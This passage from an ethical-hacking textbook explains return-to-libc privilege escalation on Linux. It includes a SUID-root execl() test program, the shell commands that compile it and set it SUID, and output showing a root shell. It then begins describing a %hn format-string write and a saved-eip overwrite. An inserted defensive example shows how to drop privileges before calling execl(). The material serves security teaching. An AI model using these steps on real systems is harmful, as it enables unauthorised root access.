The execl() function contains
a NULL value as the last argument. We will deal with that in a moment.
First, let's test the execl() function call with a simple test program and ensure it does
not drop privileges when run as root.
BT book $ cat test_execl.c
#include <unistd.h>   /* execl() */

int main(void){
    /* exec the SUID-root wrapper; the argument list is terminated by a NULL pointer */
    execl("./wrapper", "./wrapper", (char *)0);
    return 0;
}
Compile and make SUID like the vulnerable program vuln2.c:
BT book $ gcc -o test_execl test_execl.c
BT book $ su
Password: ****
BT book # chown root.root test_execl
BT book # chmod +s test_execl
BT book # ls -l test_execl
-rwsr-sr-x 1 root root 8039 Dec 20 00:59 test_execl*
BT book # exit
exit
Run it to test the functionality.
BT book $ ./test_execl
sh-3.1# id
uid=0(root) gid=0(root) groups=100(users)
sh-3.1# exit
exit
BT book $
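The test above depends on execl() carrying the effective root uid across the exec. As an added defensive example, not code from the book, here is the pattern a SUID helper should use instead: permanently drop to the caller's real ids, verify the drop took, and only then call execl() on the page's ./wrapper. setresuid()/setresgid() are assumed available (glibc with _GNU_SOURCE).

```c
#define _GNU_SOURCE          /* setresuid()/setresgid() on glibc */
#include <stdio.h>
#include <unistd.h>
#include <sys/types.h>

/* Drop elevated privileges permanently: groups first, then user.
 * Returns 0 on success, -1 if any step fails or the drop did not take. */
int drop_privileges(uid_t uid, gid_t gid)
{
    /* Group ids must go first; once the uid is unprivileged, setresgid() would fail. */
    if (setresgid(gid, gid, gid) != 0)
        return -1;
    /* Set real, effective and saved uid together so nothing is left to restore from. */
    if (setresuid(uid, uid, uid) != 0)
        return -1;
    /* Verify instead of trusting the return codes alone. */
    if (getuid() != uid || geteuid() != uid || getgid() != gid || getegid() != gid)
        return -1;
    /* Regaining root must now be impossible for a non-root target. */
    if (uid != 0 && setuid(0) == 0)
        return -1;
    return 0;
}

int main(void)
{
    /* Under SUID root: real ids are the invoking user's, effective ids are root's. */
    if (drop_privileges(getuid(), getgid()) != 0) {
        perror("drop_privileges");
        return 1;
    }
    /* Only reached with the caller's own privileges. */
    execl("./wrapper", "./wrapper", (char *)0);
    perror("execl");   /* execl() only returns on failure */
    return 1;
}
```

Built and made SUID like test_execl, this binary gives the caller a shell with the caller's own uid, not uid=0.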
Great, we now have a way to keep the root privileges. Now all we need is a way to produce
a NULL byte on the stack. There are several ways to do this; however, for illustrative
purposes, we will use the printf() function as a wrapper around the execl() function.
Recall that the %hn format token can be used to write into memory locations. To make
this happen, we need to chain more than one libc function call together as shown:
Gray Hat Hacking: The Ethical Hacker's Handbook
190
Just like before, we will overwrite the old saved eip with the address of the glibc printf()
function.